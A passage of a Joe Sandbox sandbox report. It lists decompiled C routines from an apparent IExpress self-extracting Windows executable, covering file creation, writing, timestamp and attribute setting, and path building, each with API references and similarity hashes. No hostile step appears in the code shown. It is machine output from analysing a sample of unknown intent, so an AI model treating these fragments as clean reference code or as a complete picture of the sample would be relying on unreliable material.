                                                                                                                                                                                                                                            						} while (_t46 != 0);
                                                                                                                                                                                                                                            						_t73 = _t74 - _t69;
                                                                                                                                                                                                                                            						_t30 = _t64 + 1 + _t74 - _t69;
                                                                                                                                                                                                                                            						__eflags = _t30 - 0x104;
                                                                                                                                                                                                                                            						if(_t30 >= 0x104) {
                                                                                                                                                                                                                                            							goto L3;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t69 = 0xa991e4;
                                                                                                                                                                                                                                            						_t30 = E00A94702( &_v268, 0xa991e4,  *(_t75 + 4));
                                                                                                                                                                                                                                            						__eflags = _t30;
                                                                                                                                                                                                                                            						if(_t30 == 0) {
                                                                                                                                                                                                                                            							goto L3;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t69 =  *((intOrPtr*)(_t75 + 0x18));
                                                                                                                                                                                                                                            						_t30 = E00A94C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
                                                                                                                                                                                                                                            						__eflags = _t30;
                                                                                                                                                                                                                                            						if(_t30 == 0) {
                                                                                                                                                                                                                                            							goto L3;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						E00A94B60( *((intOrPtr*)(_t75 + 0x14))); // executed
                                                                                                                                                                                                                                            						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
                                                                                                                                                                                                                                            						__eflags = _t50;
                                                                                                                                                                                                                                            						if(_t50 != 0) {
                                                                                                                                                                                                                                            							_t51 = _t50 & 0x00000027;
                                                                                                                                                                                                                                            							__eflags = _t51;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t51 = 0x80;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t30 = SetFileAttributesA( &_v268, _t51); // executed
                                                                                                                                                                                                                                            						__eflags = _t30;
                                                                                                                                                                                                                                            						if(_t30 == 0) {
                                                                                                                                                                                                                                            							goto L3;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t33 = 1;
                                                                                                                                                                                                                                            							goto L35;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t30 = _t44 - 1;
                                                                                                                                                                                                                                            					__eflags = _t30;
                                                                                                                                                                                                                                            					if(_t30 == 0) {
                                                                                                                                                                                                                                            						goto L3;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					goto L9;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(_a4 == 3) {
                                                                                                                                                                                                                                            					_t30 = E00A94B60( *((intOrPtr*)(_t75 + 0x14)));
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				goto L3;
                                                                                                                                                                                                                                            			}































                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a94e6a
                                                                                                                                                                                                                                            0x00a94e6f
                                                                                                                                                                                                                                            0x00a94e71
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a94e77
                                                                                                                                                                                                                                            0x00a94e7d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a94e7d
                                                                                                                                                                                                                                            0x00a94d25
                                                                                                                                                                                                                                            0x00a94d25
                                                                                                                                                                                                                                            0x00a94d28
                                                                                                                                                                                                                                            0x00a94d36
                                                                                                                                                                                                                                            0x00a94d3b
                                                                                                                                                                                                                                            0x00a94d40
                                                                                                                                                                                                                                            0x00a94d40
                                                                                                                                                                                                                                            0x00a94d42
                                                                                                                                                                                                                                            0x00a94d43
                                                                                                                                                                                                                                            0x00a94d43
                                                                                                                                                                                                                                            0x00a94d47
                                                                                                                                                                                                                                            0x00a94d4a
                                                                                                                                                                                                                                            0x00a94d4a
                                                                                                                                                                                                                                            0x00a94d4c
                                                                                                                                                                                                                                            0x00a94d4f
                                                                                                                                                                                                                                            0x00a94d4f
                                                                                                                                                                                                                                            0x00a94d51
                                                                                                                                                                                                                                            0x00a94d52
                                                                                                                                                                                                                                            0x00a94d52
                                                                                                                                                                                                                                            0x00a94d56
                                                                                                                                                                                                                                            0x00a94d5b
                                                                                                                                                                                                                                            0x00a94d5d
                                                                                                                                                                                                                                            0x00a94d62
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a94d67
                                                                                                                                                                                                                                            0x00a94d6f
                                                                                                                                                                                                                                            0x00a94d74
                                                                                                                                                                                                                                            0x00a94d76
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a94d7c
                                                                                                                                                                                                                                            0x00a94d84
                                                                                                                                                                                                                                            0x00a94d89
                                                                                                                                                                                                                                            0x00a94d8b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a94d94
                                                                                                                                                                                                                                            0x00a94d99
                                                                                                                                                                                                                                            0x00a94d9e
                                                                                                                                                                                                                                            0x00a94da1
                                                                                                                                                                                                                                            0x00a94daa
                                                                                                                                                                                                                                            0x00a94daa
                                                                                                                                                                                                                                            0x00a94da3
                                                                                                                                                                                                                                            0x00a94da3
                                                                                                                                                                                                                                            0x00a94da3
                                                                                                                                                                                                                                            0x00a94db5
                                                                                                                                                                                                                                            0x00a94dbb
                                                                                                                                                                                                                                            0x00a94dbd
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a94dc3
                                                                                                                                                                                                                                            0x00a94dc5
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a94dc5
                                                                                                                                                                                                                                            0x00a94dbd
                                                                                                                                                                                                                                            0x00a94d2a
                                                                                                                                                                                                                                            0x00a94d2a
                                                                                                                                                                                                                                            0x00a94d2d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a94d2d
                                                                                                                                                                                                                                            0x00a94cf8
                                                                                                                                                                                                                                            0x00a94cfd
                                                                                                                                                                                                                                            0x00a94d02
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 00A94DB5
                                                                                                                                                                                                                                            • SetDlgItemTextA.USER32(00000000,00000837,?), ref: 00A94DDD
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AttributesFileItemText
                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                                                                                                                                                                                                                                            • API String ID: 3625706803-1610346413
                                                                                                                                                                                                                                            • Opcode ID: 76bc4a8c8058999d8c414e79e96ffb87cc1ae4317e08b7364155576e0fb16012
                                                                                                                                                                                                                                            • Instruction ID: 7d5c163f15a9a508d275863a8d3aa242725cdfbc00f1e489e74d0f9e26e18bc4
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 76bc4a8c8058999d8c414e79e96ffb87cc1ae4317e08b7364155576e0fb16012
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2B41003A3002059ACF259F68DA44EF677E5AF4D304F148669E886A7285DE31DE4BC790
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00A94C37(signed int __ecx, int __edx, int _a4) {
                                                                                                                                                                                                                                            				struct _FILETIME _v12;
                                                                                                                                                                                                                                            				struct _FILETIME _v20;
                                                                                                                                                                                                                                            				FILETIME* _t14;
                                                                                                                                                                                                                                            				int _t15;
                                                                                                                                                                                                                                            				signed int _t21;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t21 = __ecx * 0x18;
                                                                                                                                                                                                                                            				if( *((intOrPtr*)(_t21 + 0xa98d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
                                                                                                                                                                                                                                            					L5:
                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t14 =  &_v12;
                                                                                                                                                                                                                                            					_t15 = SetFileTime( *(_t21 + 0xa98d74), _t14, _t14, _t14); // executed
                                                                                                                                                                                                                                            					if(_t15 == 0) {
                                                                                                                                                                                                                                            						goto L5;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					return 1;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}









                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 00A94C54
                                                                                                                                                                                                                                            • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00A94C66
                                                                                                                                                                                                                                            • SetFileTime.KERNELBASE(?,?,?,?), ref: 00A94C7E
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Time$File$DateLocal
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2071732420-0
                                                                                                                                                                                                                                            • Opcode ID: 296e14f7f4d6fded04cb61a5ac6d1dd5102d1d91b270b354efe2e7ad19698295
                                                                                                                                                                                                                                            • Instruction ID: 9ac5585b6bc64897e1954f4fdb973bebe1c85b6246c9216b11d857209d89f686
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 296e14f7f4d6fded04cb61a5ac6d1dd5102d1d91b270b354efe2e7ad19698295
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 32F0907271120CAF9F64DFB4CC49DBB77ECEB18240B44052BA815C1150EA30D915C7A0
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 75%
                                                                                                                                                                                                                                            			E00A9487A(CHAR* __ecx, signed int __edx) {
                                                                                                                                                                                                                                            				void* _t7;
                                                                                                                                                                                                                                            				CHAR* _t11;
                                                                                                                                                                                                                                            				long _t18;
                                                                                                                                                                                                                                            				long _t23;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t11 = __ecx;
                                                                                                                                                                                                                                            				asm("sbb edi, edi");
                                                                                                                                                                                                                                            				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
                                                                                                                                                                                                                                            				if((__edx & 0x00000100) == 0) {
                                                                                                                                                                                                                                            					asm("sbb esi, esi");
                                                                                                                                                                                                                                            					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					if((__edx & 0x00000400) == 0) {
                                                                                                                                                                                                                                            						asm("sbb esi, esi");
                                                                                                                                                                                                                                            						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t23 = 1;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
                                                                                                                                                                                                                                            				if(_t7 != 0xffffffff || _t23 == 3) {
                                                                                                                                                                                                                                            					return _t7;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					E00A9490C(_t11);
                                                                                                                                                                                                                                            					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}








                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,00A94A23,?,00A94F67,*MEMCAB,00008000,00000180), ref: 00A948DE
                                                                                                                                                                                                                                            • CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,00A94F67,*MEMCAB,00008000,00000180), ref: 00A94902
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CreateFile
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 823142352-0
                                                                                                                                                                                                                                            • Opcode ID: f18fc2a2f5b31109e724c2dc69cd4dad46ad8c3f127d662d937c1cd737d1d458
                                                                                                                                                                                                                                            • Instruction ID: c6ae5ec2a510f206636691f70e17665d5bbcd499bffd3e68ab6cd4f8c984c977
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f18fc2a2f5b31109e724c2dc69cd4dad46ad8c3f127d662d937c1cd737d1d458
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 67014BA3F1257026F72481694C88FB7559CCB9A735F2B4336FDAAE71D1D5644C0681E0
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 93%
E00A94AD0(signed int _a4, void* _a8, long _a12) {
    signed int _t9;
    int _t12;
    signed int _t14;
    signed int _t15;
    void* _t20;
    struct HWND__* _t21;
    signed int _t24;
    signed int _t25;

    _t20 =  *0xa9858c; // 0x268
    _t9 = E00A93680(_t20);
    if( *0xa991d8 == 0) {
        _push(_t24);
        _t12 = WriteFile( *(0xa98d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
        if(_t12 != 0) {
            _t25 = _a12;
            if(_t25 != 0xffffffff) {
                _t14 =  *0xa99400; // 0x2e800
                _t15 = _t14 + _t25;
                 *0xa99400 = _t15;
                if( *0xa98184 != 0) {
                    _t21 =  *0xa98584; // 0x0
                    if(_t21 != 0) {
                        SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0xa993f8, 0);
                    }
                }
            }
        } else {
            _t25 = _t24 | 0xffffffff;
        }
        return _t25;
    } else {
        return _t9 | 0xffffffff;
    }
}












APIs
  • Part of subcall function 00A93680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 00A9369F
  • Part of subcall function 00A93680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00A936B2
  • Part of subcall function 00A93680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00A936DA
• WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00A94B05
Memory Dump Source
• Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
• Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
Similarity
• API ID: MessagePeek$FileMultipleObjectsWaitWrite
• String ID:
• API String ID: 1084409-0
• Opcode ID: cabd5539252d18265baf707039a089862e4ec9785116a741bce7e073265a8f9d
• Instruction ID: 78e1f8e8d42108229a17b37f327fcca7a6a76e209e45bfdca1810a4c7d2c62f4
• Opcode Fuzzy Hash: cabd5539252d18265baf707039a089862e4ec9785116a741bce7e073265a8f9d
• Instruction Fuzzy Hash: E4012931300215ABEB15CFA8DC45FA677A9AB49725F14822AE9399A1E0CF70D813CB90
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E00A9658A(char* __ecx, void* __edx, char* _a4) {
    intOrPtr _t4;
    char* _t6;
    char* _t8;
    void* _t10;
    void* _t12;
    char* _t16;
    intOrPtr* _t17;
    void* _t18;
    char* _t19;

    _t16 = __ecx;
    _t10 = __edx;
    _t17 = __ecx;
    _t1 = _t17 + 1; // 0xa98b3f
    _t12 = _t1;
    do {
        _t4 =  *_t17;
        _t17 = _t17 + 1;
    } while (_t4 != 0);
    _t18 = _t17 - _t12;
    _t2 = _t18 + 1; // 0xa98b40
    if(_t2 < __edx) {
        _t19 = _t18 + __ecx;
        if(_t19 > __ecx) {
            _t8 = CharPrevA(__ecx, _t19); // executed
            if( *_t8 != 0x5c) {
                 *_t19 = 0x5c;
                _t19 =  &(_t19[1]);
            }
        }
        _t6 = _a4;
         *_t19 = 0;
        while( *_t6 == 0x20) {
            _t6 = _t6 + 1;
        }
        return E00A916B3(_t16, _t10, _t6);
    }
    return 0x8007007a;
}













                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CharPrevA.USER32(00A98B3E,00A98B3F,00000001,00A98B3E,-00000003,?,00A960EC,00A91140,?), ref: 00A965BA
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CharPrev
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 122130370-0
                                                                                                                                                                                                                                            • Opcode ID: a37e989459da95628cfd54a614f1b2c4dbd4a5e98963cd4bd77aa346ba79f88d
                                                                                                                                                                                                                                            • Instruction ID: cd0a7ed1c148a366d4e80bacd6dfe7f830657b88b4be3ebf645845e57ed672be
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a37e989459da95628cfd54a614f1b2c4dbd4a5e98963cd4bd77aa346ba79f88d
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 21F04C327042509BDB324A1D9884B66BFDE9F86350F2A016FE8DEC3209CA658C46C3A4
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                                                                                                            			E00A9621E() {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				signed int _t5;
                                                                                                                                                                                                                                            				void* _t9;
                                                                                                                                                                                                                                            				void* _t13;
                                                                                                                                                                                                                                            				void* _t19;
                                                                                                                                                                                                                                            				void* _t20;
                                                                                                                                                                                                                                            				signed int _t21;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t5 =  *0xa98004; // 0x306ebedf
                                                                                                                                                                                                                                            				_v8 = _t5 ^ _t21;
                                                                                                                                                                                                                                            				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                                                            					0x4f0 = 2;
                                                                                                                                                                                                                                            					_t9 = E00A9597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					E00A944B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
                                                                                                                                                                                                                                            					 *0xa99124 = E00A96285();
                                                                                                                                                                                                                                            					_t9 = 0;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00A96CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
                                                                                                                                                                                                                                            			}












                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00A9623F
                                                                                                                                                                                                                                              • Part of subcall function 00A944B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A94518
                                                                                                                                                                                                                                              • Part of subcall function 00A944B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00A94554
                                                                                                                                                                                                                                              • Part of subcall function 00A96285: GetLastError.KERNEL32(00A95BBC), ref: 00A96285
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: DirectoryErrorLastLoadMessageStringWindows
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 381621628-0
                                                                                                                                                                                                                                            • Opcode ID: 58e9436a5ee27d1ed73826b12b4dc4e8a8672b1dfc407b54e635b6e6adb99092
                                                                                                                                                                                                                                            • Instruction ID: f1e592e0f60cdcd737c465d4f1dd8601b2a7d7480960690f837bbe13b8d06b0e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 58e9436a5ee27d1ed73826b12b4dc4e8a8672b1dfc407b54e635b6e6adb99092
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FDF0B4B0B002086BEF50EB748E02FFE32F8DB94300F40006AB986D6081ED749D458650
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00A94B60(signed int _a4) {
                                                                                                                                                                                                                                            				signed int _t9;
                                                                                                                                                                                                                                            				signed int _t15;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t15 = _a4 * 0x18;
                                                                                                                                                                                                                                            				if( *((intOrPtr*)(_t15 + 0xa98d64)) != 1) {
                                                                                                                                                                                                                                            					_t9 = FindCloseChangeNotification( *(_t15 + 0xa98d74)); // executed
                                                                                                                                                                                                                                            					if(_t9 == 0) {
                                                                                                                                                                                                                                            						return _t9 | 0xffffffff;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					 *((intOrPtr*)(_t15 + 0xa98d60)) = 1;
                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t15 + 0xa98d60)) = 1;
                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t15 + 0xa98d68)) = 0;
                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t15 + 0xa98d70)) = 0;
                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t15 + 0xa98d6c)) = 0;
                                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                                            			}






                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,00A94FA1,00000000), ref: 00A94B98
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2591292051-0
                                                                                                                                                                                                                                            • Opcode ID: 9842d290ebcc87940d430a15d3c55379d31849ca4e9d8be37c1feb60278b1272
                                                                                                                                                                                                                                            • Instruction ID: 3ee9df78f49577059d7e9611a2cc66e57ed969317c33cc20ff95c75869793e47
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9842d290ebcc87940d430a15d3c55379d31849ca4e9d8be37c1feb60278b1272
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7DF01271700B089E5F71CF39CC01A52BBE4AAA6360310092F956ED2190DB35A44ACBD0
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00A966AE(CHAR* __ecx) {
                                                                                                                                                                                                                                            				unsigned int _t1;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t1 = GetFileAttributesA(__ecx); // executed
                                                                                                                                                                                                                                            				if(_t1 != 0xffffffff) {
                                                                                                                                                                                                                                            					return  !(_t1 >> 4) & 0x00000001;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}





                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetFileAttributesA.KERNELBASE(?,00A94777,?,00A94E38,?), ref: 00A966B1
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AttributesFile
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3188754299-0
